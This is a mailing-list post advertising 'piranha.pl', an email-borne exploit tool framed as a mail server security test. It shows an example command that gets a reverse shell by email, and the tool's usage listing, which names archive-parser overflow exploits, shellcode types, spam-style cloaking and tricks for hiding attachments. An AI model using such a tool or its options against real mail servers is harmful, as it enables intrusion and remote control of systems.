Is your mail server secure?
Test it!
Piranha.pl example: Connect back with a reverse shell just by sending an email using "Viagra" cloaking.
$ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
myname@mydomain.com
Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]
Mandatory arguments:
-e+ Exploit number to use (See below)
-h+ SMTP server to test
-a+ Destination email address used in probing
Optional arguments:
-s+ Shellcode type to inject into exploits (See below)
-c+ Cloaking style (See below)
-d+ Try to vanish attachments from MUA's view (See below)
-v Attach EICAR virus to improve stealthness
-z Pack all the malware into a tarball to be less noisy
-p+ Port to use in reverse shell or bind shell
-l+ Host to connect back in reverse shell mode
Valid exploits numbers:
0 OSVDB #5753: LHA get_header File Name Overflow
1 OSVDB #5754: LHA get_header Directory Name Overflow
2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow
3 OSVDB #11695: unarj Filename Handling Overflow
4 OSVDB #23460: ZOO combine File and Dir name overflow
5 OSVDB #15867: Convert UUlib uunconc integer overflow
6 OSVDB #XXX: ZOO next offset infinite loop DoS
Valid shellcode types:
0 TCP reverse shell
1 UDP reverse shell
2 TCP bind shell
Valid cloaking styles (consult whitepaper for visual result):
0 No cloaking at all (default)
1 Viagra spam message
2 "Look at the pictures I promised you!"
Vanishing techniques for attachments:
0 No vanishing at all (default)
1 Multipart/alternative trick
2 <img src="image.JPG" width=0 height=0> trick
Obnosis.com |
http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
_________________________________________________________________
Windows Live Hotmail now works up to 70% faster.
http://windowslive.com/Explore/Hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_faster_112008---------------------------------------------------
PLUG-discuss mailing list -
PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss